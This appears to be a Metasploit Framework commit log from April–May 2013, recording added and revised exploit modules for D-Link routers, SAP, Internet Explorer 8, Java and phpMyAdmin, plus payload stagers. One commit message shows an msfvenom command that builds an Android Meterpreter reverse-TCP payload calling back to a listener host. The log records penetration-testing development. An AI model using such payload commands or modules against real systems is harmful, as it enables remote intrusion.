jvazquez-r7
dfa19cb46d
Do minor cleanup for dlink_dir615_up_exec
2013-05-19 12:43:01 -05:00
jvazquez-r7
348705ad46
Land #1800 , @m-1-k-3's exploit for DLINK DIR615
2013-05-19 12:42:02 -05:00
m-1-k-3
f3a2859bed
removed user,pass in request
2013-05-19 18:50:12 +02:00
m-1-k-3
aee5b02f65
tftp download check
2013-05-19 18:45:01 +02:00
m-1-k-3
4816925f83
feeback included
2013-05-19 16:19:45 +02:00
jvazquez-r7
85ceaa1a62
Add module for CVE-2013-2730
2013-05-18 12:44:24 -05:00
dcbz
9c0814505a
Added reverse stager.
2013-05-17 21:52:10 -05:00
dcbz
14d5111b37
Added a sample stage + updated bind stager.
2013-05-17 21:03:03 -05:00
dcbz
ad95eff9d4
added bind_tcp.rb
2013-05-17 12:09:45 -05:00
Dejan Lukan
945dde3389
Added CVE-2013-0229 for MiniUPnPd < 1.4
2013-05-17 13:58:32 +02:00
James Lee
42d8173d17
Land #1837 , broken references
2013-05-16 14:32:46 -05:00
James Lee
3009bdb57e
Add a few more references for those without
2013-05-16 14:32:02 -05:00
jvazquez-r7
d9bdf3d52e
Do final cleanup for sap_smb_relay
2013-05-16 14:25:10 -05:00
jvazquez-r7
9dd582c526
Land #1656 , @nmonkee's module for SMB Relay attacks against SAP
2013-05-16 14:23:39 -05:00
h0ng10
ccef6e12d2
changed to array in array
2013-05-16 19:03:47 +02:00
h0ng10
460542506d
changed to array
2013-05-16 19:01:20 +02:00
h0ng10
378f0fff5b
added missing comma
2013-05-16 18:59:46 +02:00
jvazquez-r7
c21035c0b9
Add final cleanup for sap_ctc_verb_tampering_user_mgmt
2013-05-16 10:42:09 -05:00
jvazquez-r7
7823df0478
Change module filename
2013-05-16 10:41:25 -05:00
jvazquez-r7
f3f0272395
Land #1652 , @nmonkee's SAP CTC Verb Tampering for User Mgmt module
2013-05-16 10:40:17 -05:00
David Maloney
4503a7af50
Don't save creds of anyuser:anypass
...
If http accepts any user and any pass, it's not a real auth
there is no reason to create cred objects for this.
These creds have been confusing our users
2013-05-16 10:25:32 -05:00
nmonkee
11286630d5
modifications to CLBA_ SOAP requests to fix XML kernel processor error
2013-05-16 11:24:29 +01:00
Joe Vennix
1a5c747bb9
Update description.
2013-05-15 23:52:51 -05:00
Joe Vennix
178a43a772
Whitespace tweaks and minor bug fix. Wrong payloads still run.
2013-05-15 23:47:04 -05:00
Joe Vennix
f4b6db8c49
Tweak whitespace.
2013-05-15 23:35:59 -05:00
Joe Vennix
a7d79e2a51
Oops, don't cache payload_filename.
2013-05-15 23:34:14 -05:00
Joe Vennix
4d5c4f68cb
Initial commit, works on three OSes, but automatic mode fails.
2013-05-15 23:32:02 -05:00
jvazquez-r7
c82bb73347
Avoid super verbose output
2013-05-15 17:45:37 -05:00
James Lee
61afe1449e
Landing #1275 , bash cmdstager
...
Conflicts:
lib/rex/exploitation/cmdstager.rb
Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
James Lee
2504aa4550
Land #1812 , mailvelope chrome extension key grabber
2013-05-15 10:10:36 -05:00
jvazquez-r7
649a8829d3
Add modules for Mutiny vulnerabilities
2013-05-15 09:02:25 -05:00
jvazquez-r7
c410a54d44
Merge SAP SMB Relay abuses in just one module
2013-05-14 20:53:08 -05:00
jvazquez-r7
357ef001cc
Change module filename
2013-05-14 20:52:33 -05:00
sinn3r
e1111928c2
Adds patch info for ie_cgenericelement_uaf
...
This one is MS13-038
2013-05-14 14:55:02 -05:00
sinn3r
41e9f35f3f
Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform
2013-05-14 14:48:16 -05:00
sinn3r
5e925f6629
Description update
2013-05-14 14:20:27 -05:00
Roberto Soares Espreto
3d7c9a9a06
Changed the path from TARGETURI
2013-05-14 00:11:40 -03:00
jvazquez-r7
42cfa72f81
Update data after test kloxo 6.1.12
2013-05-13 19:09:06 -05:00
jvazquez-r7
58f2373171
Added module for EDB 25406
2013-05-13 18:08:23 -05:00
sinn3r
5e997aaf80
Landing #1816 - lists essential information about CouchDB
2013-05-13 16:46:20 -05:00
sinn3r
cba045a604
Make additional changes to the module
2013-05-13 16:42:33 -05:00
Tod Beardsley
e3384439ed
64-bit, not '64 bits'
2013-05-13 15:40:17 -05:00
jvazquez-r7
e71e0c1c28
Land #1822 , @wchen-r7's module for Coldfusion HTP disclosed exploit
2013-05-13 12:41:54 -05:00
jvazquez-r7
f04ca17bb9
Fix default action
2013-05-13 11:56:02 -05:00
jvazquez-r7
5b64379553
Add Coldfusion 9 target, OSVDB ref and review
2013-05-13 11:55:11 -05:00
sinn3r
60299c2adb
Add EDB-25305 - That ColdFusion 10 sub0 0day stuff
...
This is just an aux module that extract passwords from
password.properties. Yes, this can leverage a shell too, but
obviously that's best implemented in #1737 , or as a new exploit.
We'll see.
2013-05-12 21:23:53 -05:00
agix
6db1fea6b9
create x64_reverse_https stagers
2013-05-13 01:41:56 +02:00
jvazquez-r7
feac292d85
Clean up for dlink_dsl320b_password_extractor
2013-05-12 17:35:59 -05:00
jvazquez-r7
ee46771de5
Land #1799 , @m-1-k-3's auth bypass module for Dlink DSL320
2013-05-12 17:34:08 -05:00
m-1-k-3
981cc891bc
description
2013-05-12 20:07:32 +02:00
jvazquez-r7
ce594a3ba2
Deprecate modules/exploits/windows/http/sap_mgmt_con_osexec_payload
2013-05-12 08:46:40 -05:00
jvazquez-r7
495f1e5013
Add multi platform module for SAP MC exec exploit
2013-05-12 08:46:00 -05:00
sinn3r
7fcf20201b
Ranking should be the same (to GoodRanking)
2013-05-11 09:19:25 -05:00
Roberto Soares Espreto
a94d078bfd
Added the statement return to condition: if res.nil?
2013-05-11 00:59:05 -03:00
Roberto Soares Espreto
18ee9af59f
Added couchdb_enum.rb to list essential information about CouchDB
2013-05-10 23:18:48 -03:00
Roberto Soares Espreto
7a7f4a1727
Added couchdb_login.rb to try to brute-force credentials of CouchDB
2013-05-10 23:16:11 -03:00
James Lee
55fc1458de
Simplify and clean up some
...
I'd really love to make this work on Linux as well, since it's really
just a file grabber/parser. Unfortunately, the Post API for enumerating
users and homedirs isn't great for cross-platform stuff like this.
A few small changes, all verified on Windows 7:
* Reuse the key storing code instead of copy-paste with minor changes
* Use binary mode when opening the stored prefs
* Don't bother checking for incognito since we're using `steal_token`
anyway
* Check for existence of directories instead of guessing based on OS
match
2013-05-10 16:58:35 -05:00
Rob Fuller
84ff72eb92
use file_exist? instead of fs.file.stat
2013-05-10 11:17:42 -04:00
Rob Fuller
25f7af43b4
use gsub instead of split/join
2013-05-10 11:12:56 -04:00
jvazquez-r7
d37d211ecc
Fix short escape sequences error
2013-05-09 17:29:55 -05:00
jvazquez-r7
4147a27216
Land #1667 , @nmonkee's sap_soap_rfc_sxpg_command_exec exploit
2013-05-09 17:00:11 -05:00
jvazquez-r7
6842432abb
Land #1678 , @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit
2013-05-09 16:52:01 -05:00
jvazquez-r7
cf05602c6f
Land #1661 , @nmonkee's sap_soap_rfc_eps_get_directory_listing module
2013-05-09 16:46:13 -05:00
jvazquez-r7
b18a98259b
Modify default rport
2013-05-09 16:24:54 -05:00
jvazquez-r7
3e1d1a3f98
Land #1659 , @nmonkee's sap_soap_rfc_eps_delete_file module
2013-05-09 16:22:54 -05:00
nmonkee
53c08cd60f
fix incorrect printing typo
2013-05-09 21:37:04 +01:00
Rob Fuller
95b0d4e5ec
move filename init up to remove dup code
...
as suggested by @jlee-r7
2013-05-09 13:29:21 -04:00
Rob Fuller
2f543d3080
extension and pref parsing
2013-05-09 13:23:28 -04:00
sinn3r
9043eeda66
A slight change for stability
...
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in #1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable. I did a few tests, seems better.
2013-05-08 20:02:55 -05:00
jvazquez-r7
bdd2287daf
Land #1809 , @wchen-r7's modification for ie_cgenericelement_uaf
2013-05-08 16:21:11 -05:00
sinn3r
0e51042a01
Landing #1808 - ERS Viewer 2011 bof (CVE-2013-0726)
2013-05-08 15:51:46 -05:00
sinn3r
9a1400a75b
Forgot to remove this print_warning
2013-05-08 15:44:04 -05:00
sinn3r
075f6e8d45
Updates ROP chain and mstime_malloc usage
2013-05-08 15:42:45 -05:00
Tod Beardsley
4c75354a6a
Land #1786 , request_cgi instead of request_raw
...
Also some other small changes to modules, such as sensible defaults for
options.
2013-05-08 14:58:04 -05:00
sinn3r
c7609ac7d1
Initial update
2013-05-08 14:24:52 -05:00
jvazquez-r7
1aa80cd35e
Add module for CVE-2013-0726
2013-05-08 13:48:48 -05:00
jvazquez-r7
e939de583c
Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec
2013-05-07 22:46:39 -05:00
jvazquez-r7
5f59d9f723
Move sap_soap_rfc_sxpg_command_exec to multi dir
2013-05-07 22:46:04 -05:00
jvazquez-r7
ab60e0bfb7
Fix print message
2013-05-07 22:41:15 -05:00
jvazquez-r7
24bad9c15c
Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform
2013-05-07 17:03:10 -05:00
jvazquez-r7
76f6d9f130
Move module to multi-platform location
2013-05-07 17:01:56 -05:00
Rob Fuller
71c68d09c1
Allow user ability to set filename for psexec service binary
...
This should probably be higher up for all
generate_payload_exe but would take a major edit
2013-05-07 15:26:22 -03:00
m-1-k-3
e3582887cf
OSVDB, Base64
2013-05-07 08:28:48 +02:00
jvazquez-r7
fff8593795
Fix author name
2013-05-06 17:34:37 -05:00
jvazquez-r7
c84febb81a
Fix extra character
2013-05-06 15:19:15 -05:00
jvazquez-r7
92b4d23c09
Add Mariano as Author because of the abuse disclosure
2013-05-06 15:15:15 -05:00
jvazquez-r7
db243e78c8
Land #1682 , sap_router_info_request fix from @nmonkee
2013-05-06 15:13:57 -05:00
jvazquez-r7
85581a0b6f
Clean up sap_soap_rfc_eps_get_directory_listing
2013-05-06 13:21:42 -05:00
jvazquez-r7
1fc0bfa165
Change module filename
2013-05-06 13:20:07 -05:00
m-1-k-3
09bf23f4d6
linksys wrt160n tftp download module
2013-05-06 16:18:15 +02:00
m-1-k-3
22d850533a
dir615 down and exec exploit
2013-05-06 15:33:45 +02:00
m-1-k-3
0f2a3fc2d4
dsl320b authentication bypass - password extract
2013-05-06 14:31:47 +02:00
jvazquez-r7
7b960a4f18
Add OSVDB reference
2013-05-06 00:54:00 -05:00
jvazquez-r7
a17062405d
Clean up for sap_soap_rfc_eps_delete_file
2013-05-06 00:53:07 -05:00
jvazquez-r7
5adc2879bf
Change module filename
2013-05-06 00:51:23 -05:00
jvazquez-r7
66a5eb74c5
Move file to auxiliary/dos/sap
2013-05-06 00:50:50 -05:00
David Maloney
e40695769d
unbotch merge?
2013-05-05 16:43:56 -05:00
David Maloney
2d99167fe7
Merge commit 'b0f5255de8f78fb0d54be1ee49f43455968d6740' into upstream-master
2013-05-05 16:41:18 -05:00
David Maloney
b0f5255de8
fix ssh_creds username
...
ssh_creds post module as not saving
the username in the cred objects
2013-05-05 16:31:28 -05:00
Tod Beardsley
8239998ada
Typo on URL for #1797 . Thx @Meatballs1
2013-05-05 12:26:06 -05:00
Tod Beardsley
c9ea7e250e
Fix disclosure date, ref for #1897
2013-05-05 12:13:02 -05:00
Tod Beardsley
e9841b216c
Land #1797 , IE8 DoL exploit module from @wchen-r7
...
Exploit for an in-the-wild unpatched vuln in IE8. @jvazquez-r7 already
reviewed functionality
2013-05-05 12:06:45 -05:00
sinn3r
a33510e821
Add MS IE8 DoL 0day exploit (CVE-2013-1347)
...
This module exploits a use-after-free vuln in IE 8, used in the
Department of Labor attack.
2013-05-05 12:04:17 -05:00
HD Moore
63b0eace32
Add a missing require
2013-05-04 22:39:57 -05:00
m-1-k-3
c3e9503c0b
tplink traversal - initial commit
2013-05-03 14:27:13 -05:00
jvazquez-r7
589be270bf
Land #1658 , @nmonkee's SAP module for PFL_CHECK_OS_FILE_EXISTENCE
2013-05-03 14:19:36 -05:00
jvazquez-r7
13202a3273
Add OSVDB reference
2013-05-03 09:46:29 -05:00
jvazquez-r7
a95de101e7
Delete extra line
2013-05-02 22:04:27 -05:00
jvazquez-r7
6210b42912
Port EDB 25141 to msf
2013-05-02 22:00:43 -05:00
jvazquez-r7
a2e1fbe7a9
Make msftidy happy
2013-05-02 19:46:26 -05:00
jvazquez-r7
f57b2de632
Land #1787 , @wchen-r7's mod to ie_cbutton_uaf to use the js_mstime_malloc API
2013-05-02 19:44:19 -05:00
Tod Beardsley
7579b574cb
Rework parse_xml
...
We try to avoid using Nokogiri in modules due to the sometimes
uncomfortable dependencies it creates with particular compiled libxml
versions. Also, the previous parse_xml doesn't seem to be correctly
skipping item entries with blank names.
I will paste the test XML in the PR proper, but do check against a live
target to make sure I'm not screwing it up.
2013-05-02 14:43:30 -05:00
Tod Beardsley
902cd7ec85
Revert removal of the SAP module
...
This reverts commit 26da7a6ee7
.
2013-05-02 14:42:35 -05:00
sinn3r
eb23b5feeb
Forgot to remove function ie8_smil. Don't need this anymore.
2013-05-02 14:04:15 -05:00
sinn3r
329e8228d1
Uses js_mstime_malloc to do the no-spray technique
2013-05-02 14:00:15 -05:00
Tod Beardsley
26da7a6ee7
Removing this from master due to test problems
...
This module was moved over to the unstable branch in commit
7106afdf7d
, working up a fix now. Stay
tuned.
2013-05-02 13:43:02 -05:00
jvazquez-r7
132c09af82
Add BID reference
2013-05-02 10:21:09 -05:00
jvazquez-r7
6e68f3cf34
Clean up sap_soap_rfc_pfl_check_os_file_existence
2013-05-02 10:19:15 -05:00
jvazquez-r7
244bf71d4a
Change module filename
2013-05-02 10:15:50 -05:00
jvazquez-r7
d9cdb6a138
Fix more feedback provided by @nmonkee: CMD vs COMMAND
2013-05-02 09:08:48 -05:00
jvazquez-r7
c6c7998e3b
Fix feedback provided by @nmonkee
2013-05-02 09:06:51 -05:00
jvazquez-r7
4db81923bf
Update description
2013-05-02 08:45:01 -05:00
jvazquez-r7
4054d91955
Land #1657 , @nmonkee's RZL_READ_DIR_LOCAL SAP dir listing module
2013-05-02 08:38:50 -05:00
jvazquez-r7
e25057b64a
Fix indent level
2013-05-01 22:01:36 -05:00
jvazquez-r7
c406271921
Cleanup sap_soap_rfc_rzl_read_dir
2013-05-01 21:51:06 -05:00
jvazquez-r7
98dd96c57d
Change module filename
2013-05-01 21:50:24 -05:00
jvazquez-r7
6b6b53240b
Fix SAP modules, mainly to make a better use of send_request_cgi
2013-05-01 14:06:53 -05:00
Michael Schierl
a13cf53b9f
Android Meterpreter bugfixes
...
- classes.dex gets mangled on windows; use binary mode when reading it
- UnknownHostExceptions on API Level 3 emulator because of trailing
whitespace after the hostname/IP
- Work around integer overflow at year 2038 when signing the payload
2013-05-01 18:01:37 +02:00
jvazquez-r7
567d2bb14b
Land #1687 , @bmerinofe's forensic file recovery post module
2013-05-01 08:13:08 -05:00
jvazquez-r7
a201391ee6
Clean recovery_files
2013-04-30 13:18:32 -05:00
Gregory Man
76e70adcff
Added Memcached Remote Denial of Service module
...
https://code.google.com/p/memcached/issues/detail?id=192
2013-04-30 17:45:09 +03:00
Tod Beardsley
60e0cfb17b
Trivial description cleanup
2013-04-29 14:11:20 -05:00
Tod Beardsley
4227c23133
Add a reference for Safari module
2013-04-29 14:07:55 -05:00
Joe Vennix
431cba8f36
Update print_status labels.
2013-04-29 11:13:53 -05:00
Joe Vennix
c2a1d296a2
Rename DOWNLOAD_URI -> DOWNLOAD_PATH.
...
Conflicts:
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
2013-04-29 11:11:06 -05:00
Joe Vennix
55e0ec3187
Add support for DOWNLOAD_URI option.
...
* Fixes some comments that were no longer accurate.
Conflicts:
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
2013-04-29 11:10:19 -05:00
sinn3r
1d9a695d2b
Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
...
[Closes #1772 ]
2013-04-28 12:17:16 -05:00
Meatballs
ccb630eca2
Whitespace and change default user
2013-04-27 10:39:27 +01:00
Meatballs
209188bc22
Add refs and use targeturi
2013-04-27 10:35:49 +01:00
Meatballs
3ac041386b
Add php version to check
2013-04-26 23:59:49 +01:00
Meatballs
e25fdebd8d
Add php version to check
2013-04-26 23:58:08 +01:00
Meatballs
cd842df3e2
Correct phpMyAdmin
2013-04-26 23:38:27 +01:00
Meatballs
6bb2af7cee
Add pma url
2013-04-26 23:37:26 +01:00
sinn3r
6821c360b6
Landing #1761 - Adds Wordpress Total Cache module
...
[Closes #1761 ]
2013-04-26 16:08:04 -05:00
sinn3r
6c76bee02f
Trying to make the description sound smoother
2013-04-26 16:02:28 -05:00
James Lee
9c8b93f1b7
Make sure LPORT is a string when subbing
...
* Gets rid of conversion errors like this:
[-] Exploit failed: can't convert Fixnum into String
* also removes comments from php meterp. Works for me with the
phpmyadmin_preg_replace bug, so seems legit.
2013-04-26 15:26:31 -05:00
James Lee
a0c1b6d1ce
Clear out PMA's error handler
...
* Add an error_handler function that just returns true. This prevents eventual
ENOMEM errors and segfaults like these:
[Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
[Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
2013-04-26 15:25:09 -05:00
Meatballs
1f2cab7aef
Tidyup and getcookies
2013-04-26 20:26:04 +01:00
Meatballs
0901d00da5
Remove redundant pay opts
2013-04-26 19:26:29 +01:00
Meatballs
a17d61897d
Change to send_rq_cgi
2013-04-26 19:19:11 +01:00
Tod Beardsley
bf6b1b4fbf
Land #1773 , fixes for Safari UXSS
...
Makes the module more user-friendly, doesn't barf on malformed paths for
keystroke logger catching.
2013-04-26 13:11:55 -05:00
Tod Beardsley
c27245e092
Touch descriptions for module and options
2013-04-26 13:05:16 -05:00
Joe Vennix
b4606ba60a
Remove unnecessary puts call.
2013-04-26 12:55:02 -05:00
Tod Beardsley
ca6d6fbc84
msftidy for whitespace
2013-04-26 12:44:11 -05:00
Tod Beardsley
16769a9260
Fixing path normalization
2013-04-26 12:40:24 -05:00
Meatballs
54233e9fba
Better entropy
2013-04-26 17:46:43 +01:00
Meatballs
c8da13cfa0
Add some entropy in request
2013-04-26 17:34:17 +01:00
Joe Vennix
2fa16f4d36
Rewrite relative script URLs to be absolute.
...
* Adds rescue clauses around URI parsing/pulling
* Actually use the URI_PATH datastore option.
2013-04-26 11:25:20 -05:00
Meatballs
a043d3b456
Fix auth check and cookie handling
2013-04-26 17:10:24 +01:00
Meatballs
025315e4e4
Move to http
2013-04-26 15:42:26 +01:00
Meatballs
9ad19ed2bf
Final tidyup
2013-04-26 15:41:28 +01:00
jvazquez-r7
99b46202b9
Do final cleanup for sap_configservlet_exec_noauth
2013-04-26 08:45:34 -05:00
jvazquez-r7
308b880d79
Land #1759 , @andrewkabai's exploit for SAP Portal Command Execution
2013-04-26 08:44:11 -05:00
Meatballs
c7ac647e4e
Initial attempt lfi
2013-04-26 14:32:18 +01:00
Andras Kabai
5839e7bb16
simplify code
2013-04-26 12:14:42 +02:00
Andras Kabai
4aadd9363d
improve description
2013-04-26 12:13:45 +02:00
sinn3r
f3f60f3e02
Fixes P/P/R for target 0 (BadBlue 2.72b)
...
Target 1, which covers 2.72b, uses an invalid P/P/R from some unknown
DLL, and appears to be broken. Because 2.72b actually uses the same
ext.dll as BadBlue EE 2.7 (and that target 0 actually also works
against 2.72b), we might as well just use the same P/P/R again.
[FixRM #7875 ]
2013-04-25 20:20:24 -05:00
jvazquez-r7
bf0375f0e9
Fix @jlee-r7's feedback
2013-04-25 18:43:21 -05:00
jvazquez-r7
8eea476cb8
Build the jnlp uri when resource is available
2013-04-25 18:43:21 -05:00
jvazquez-r7
cc961977a2
Add bypass for click2play
2013-04-25 18:43:21 -05:00
jvazquez-r7
9b5e96b66f
Fix @jlee-r7's feedback
2013-04-25 14:53:09 -05:00
jvazquez-r7
52b721c334
Update description
2013-04-25 14:47:35 -05:00
jvazquez-r7
84e9f80ffa
Add check for WP-Super-Cache
2013-04-25 14:43:16 -05:00
James Lee
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Andras Kabai
9dd9b2d1ba
implement cleanup functionality
...
register DELETE_FILES advanced option to take control of the cleanup
functionality of CmdStagerVBS and FileDropper, implement the necessary
changes
2013-04-25 20:02:24 +02:00
jvazquez-r7
15c8d92148
Fix version checked and add reference
2013-04-25 12:48:36 -05:00
Andras Kabai
a28ef1847b
update references
2013-04-25 18:26:13 +02:00
Joe Vennix
993356c73e
Add safari webarchive uxss to framework as an aux module.
2013-04-25 11:14:16 -05:00
jvazquez-r7
b67fcd3219
Add OSVDB ref to sap_configservlet_exec_noauth
2013-04-25 08:13:32 -05:00
jvazquez-r7
7d317e5933
Switch from post to get on check
2013-04-25 07:51:28 -05:00
jvazquez-r7
d55faa14d3
Add check function
2013-04-25 07:44:37 -05:00
Andras Kabai
676f2f5f4a
implement "check" functionality
2013-04-25 07:47:30 +02:00
Andras Kabai
3b46d5d4cd
fix typos
2013-04-25 07:22:16 +02:00
Andras Kabai
2759ef073e
correction on error handling
2013-04-25 07:19:27 +02:00
Andras Kabai
6b14ac5e71
add rank to module
2013-04-25 07:07:35 +02:00
jvazquez-r7
51fd07a145
Add BID reference
2013-04-24 21:48:05 -05:00
jvazquez-r7
378c2079a2
Add hdm also as author
2013-04-24 17:37:29 -05:00
jvazquez-r7
b816dd569c
Update description
2013-04-24 17:34:25 -05:00
jvazquez-r7
573e880a62
Use the correct post id when posting
2013-04-24 17:30:24 -05:00
jvazquez-r7
ded0269ba0
Add POST ID bruteforcing capabality
2013-04-24 17:21:36 -05:00
jvazquez-r7
fca4c3b8b2
Add sha1 sum check to allow execution
2013-04-24 16:10:49 -05:00
jvazquez-r7
d2e29b846c
Add module for Wordpress Total Cache PHP Injection
2013-04-24 15:29:40 -05:00
Andras Kabai
f22d19a10c
remove unused code block
...
ARCH_CMD was implemented in previous version of this code.
2013-04-24 21:51:35 +02:00
Andras Kabai
0339be229a
implement dynamic timeout handling
2013-04-24 18:22:37 +02:00
Andras Kabai
6f8fc81497
improve error handling
2013-04-24 17:59:11 +02:00
jvazquez-r7
2b4144f20f
Add module for US-CERT-VU 345260
2013-04-24 10:47:16 -05:00
Andras Kabai
57113bee80
fine correction
...
add license
remove one unnecessary tab to make msftidy happy
2013-04-24 15:07:32 +02:00
Andras Kabai
6485124cdf
fix module name
2013-04-24 10:54:52 +02:00
Andras Kabai
358b8934bf
clarify description
2013-04-24 10:31:40 +02:00
Andras Kabai
00e6eeca54
implement command line magick to prevent bad char usage
...
commas in the HTTP queries are not allowed but the VBS stager contains
some, therefore it was necessary to find a way to echo out commas
without directly use them.
thanks to Laszlo Toth to help me figure out this windows command line
trick.
2013-04-24 09:46:36 +02:00
Andras Kabai
783cca6c17
allow only ARCH_X86 payloads
2013-04-24 09:29:47 +02:00
sinn3r
cae30bec23
Clean up all the whitespace found
2013-04-23 18:27:11 -05:00
jvazquez-r7
ece36c0610
Update references for the las Java exploit
2013-04-22 21:55:04 -05:00
jvazquez-r7
1529dff3f3
Do final cleanup for sap_configservlet_exec_noauth
2013-04-22 21:43:41 -05:00
jvazquez-r7
8c9715c2ed
Land #1751 , @andrewkabai's SAP Portal remote OS command exec
2013-04-22 21:41:53 -05:00
sinn3r
a09b3b8023
Lands #1169 - Adds a check
...
[Closes #1169 ]
Conflicts:
modules/auxiliary/dos/http/apache_range_dos.rb
2013-04-22 15:50:15 -05:00
sinn3r
882b084cba
Changes the default action
2013-04-22 15:47:38 -05:00
sinn3r
7e28a4ddb0
Uses "ACTIONS" keys instead of datastore options
...
It's better to use ACTIONS instead of datastore in this case. Also,
did some cleanup.
2013-04-22 15:41:47 -05:00
sinn3r
dfff20a3fc
Landing #1692 - Handles OSQL banners and responses
...
[Close #1692 ]
2013-04-22 13:58:44 -05:00
Andras Kabai
79eb2ff62d
add EDB ID to references
2013-04-22 18:37:28 +02:00
Andras Kabai
15b06c43aa
sap_configservlet_exec_noauth auxiliary module
...
the final module was moved from my master branch to here because of the
pull request needs
2013-04-22 17:40:27 +02:00
Andras Kabai
b4f1f3efbb
remove aux module from master branch
2013-04-22 17:34:01 +02:00
Andras Kabai
750638e4d6
note on bad characters
2013-04-22 17:24:08 +02:00
Andras Kabai
a1e52b5b27
command execution needs cmd /c
2013-04-22 10:20:45 +02:00
Antoine
0115833724
SyntaxError fixes
2013-04-21 20:22:41 +00:00
Andras Kabai
d26289e05a
proper output handling in case of CMD payloads
2013-04-20 17:38:58 +02:00
Andras Kabai
d59ba37e6d
resize linemax
2013-04-20 17:37:50 +02:00
Andras Kabai
e36b58169b
implement CmbStagerVBS payload execution
2013-04-20 16:37:47 +02:00
Andras Kabai
8244c4dcac
multiple payload types, different paths to execute payloads
2013-04-20 14:20:30 +02:00
Andras Kabai
7b6a784a84
basic payload execution through OS command execution
2013-04-20 13:02:22 +02:00
Andras Kabai
223556a4e6
switch to exploit module environment
...
switch to Msf::Exploit, change the necessary declarations, start to
change the exploitation process
2013-04-20 12:30:44 +02:00
Andras Kabai
cff47771a2
initial commit
...
the original aux module will be the base of the exploit module
2013-04-20 11:32:05 +02:00
jvazquez-r7
1365dfe68c
Add Oracle url
2013-04-20 01:43:14 -05:00
jvazquez-r7
b99fc06b6f
description updated
2013-04-20 01:43:14 -05:00
jvazquez-r7
19f2e72dbb
Added module for Java 7u17 sandboxy bypass
2013-04-20 01:43:13 -05:00
Andras Kabai
49b055e5fd
make msftidy happy
2013-04-20 00:26:04 +02:00
Andras Kabai
e4d9c45ce9
remove unnecessary rank rating
2013-04-20 00:23:55 +02:00
jvazquez-r7
c7fcd6931a
Use vprint_error
2013-04-19 16:22:07 -05:00
jvazquez-r7
4ef33197dc
Land #1745 - @FireFart's improvement for MediaWiki aux module
2013-04-19 16:20:33 -05:00
jvazquez-r7
19a158dce9
Do final cleanup for netgear_dgn2200b_pppoe_exec
2013-04-19 15:50:23 -05:00
jvazquez-r7
c1819e6ecc
Land #1700 , @m-1-k-3's exploit for Netgear DGN2200B
2013-04-19 15:49:30 -05:00
Christian Mehlmauer
eaff87879e
added text
2013-04-19 22:03:05 +02:00
Christian Mehlmauer
a6be72b019
fixes for mediawiki aux module
2013-04-19 21:43:12 +02:00
Andras Kabai
763d1ac2f1
remove unnecessary option declaration
2013-04-19 21:42:28 +02:00
Andras Kabai
85932a2445
improve URI path and parameter handling
...
switch from PATH to TARGETURI datastore;
use normalize_uri to build uri;
use query in send_request_cgi to to prepare query string (instead of
vars_get that escapes the necessary semicolons)
2013-04-19 21:37:39 +02:00
Andras Kabai
c52588f579
remove Scanner mixin
...
remove Scanner mixin because this module is not a scanner modul
2013-04-19 20:28:44 +02:00
sinn3r
7fdf84ac45
Landing #1744 - Checks nil before using resp.headers['Server']
...
[Closes #1744 ]
2013-04-19 10:37:05 -05:00
jvazquez-r7
31586770a0
Added module for OSVDB 92490
2013-04-18 14:34:02 -05:00
Andras Kabai
8f76c436d6
SAP ConfigServlet OS Command Execution module
...
This module allows execution of operating system commands throug the
SAP ConfigServlet without any authentication.
2013-04-18 20:26:48 +02:00
RageLtMan
15c6df1482
Check for nil before calling on value
2013-04-18 00:32:37 -04:00
m-1-k-3
2713991c64
timeout and HTTP_Delay
2013-04-17 20:25:59 +02:00
m-1-k-3
59045f97fb
more testing, reworking of config restore, rework of execution
2013-04-17 18:10:27 +02:00
jvazquez-r7
4e8d32a89a
cleanup for freefloatftp_user
2013-04-16 20:43:38 -05:00
jvazquez-r7
eedeb37047
Landing #1731 , @dougsko's freefloat ftp server bof exploit
2013-04-16 20:42:01 -05:00
root
830715dc07
Applying changes
2013-04-16 00:28:39 +02:00
Tod Beardsley
a36c6d2434
Lands #1730 , adds a VERBOSE option checker
...
Also removes VERBOSE options from extant modules. There were only 5 of
them, and one was a commented option.
2013-04-15 15:32:56 -05:00
Tod Beardsley
29101bad41
Removing VERBOSE offenders
2013-04-15 15:29:56 -05:00
Tod Beardsley
be39079830
Trailing whitespace fix
...
Note that this commit needed a --no-verify because of the erroneous
check in msftidy for writing to stdout. The particular syntax of this
payload makes it look like we're doing that when we're really not.
So don't sweat it.
2013-04-15 13:58:06 -05:00
Tod Beardsley
efdf4e3983
Lands #1485 , fixes for Windows-based Ruby targets
2013-04-15 13:56:41 -05:00
Tod Beardsley
873bdbab57
Removing APSB13-03, not ready.
...
This was landed by @todb-r7 on #1709 but that was premature. #1717 was
a proposed set of fixes, but it didn't go far enough.
@jhart-r7 and @jvazquez-r7 should revisit this module for sure, there's
some good stuff in there, but it's not ready for a real release quite
yet. Take a look at the issues discussed in those PRs and open a new PR
with a new module?
Sorry for the switcheroo, not trying to be a jerk.
[Closes #1717 ]
2013-04-15 13:36:47 -05:00
Tod Beardsley
513b3b1455
Minor cleanup on DLink module
2013-04-15 13:27:47 -05:00
timwr
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
timwr
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
jvazquez-r7
7e5d4bc893
Landing #1614 , @jwpari nagios nrpe exploit
2013-04-11 17:53:52 +02:00
James Lee
e3eef76372
Land #1223
...
This adds rc4-encrypting stagers for Windows.
